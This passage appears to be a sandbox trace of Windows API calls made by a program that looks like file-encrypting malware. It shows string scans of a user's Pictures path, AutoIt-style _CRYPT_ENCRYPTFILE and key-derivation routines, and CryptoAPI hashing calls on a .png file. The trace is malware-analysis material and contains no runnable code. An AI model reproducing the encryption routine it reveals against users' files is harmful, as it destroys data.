cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.305] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.305] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.305] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.305] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.305] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.305] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.305] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.305] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x82a6dc10, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="x6Gb.png", cAlternateFileName="")) returned 0x90ae18 [0190.306] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.306] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.306] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.306] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.306] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.306] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.306] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.306] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.306] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.306] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.306] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.306] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.306] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.306] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.307] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0190.307] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.307] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.308] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.308] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.308] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.308] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.308] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.308] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.309] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.309] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.309] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.309] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.309] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.309] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.309] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.309] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.313] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.313] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.313] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.314] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] CharUpperBuffW (in: 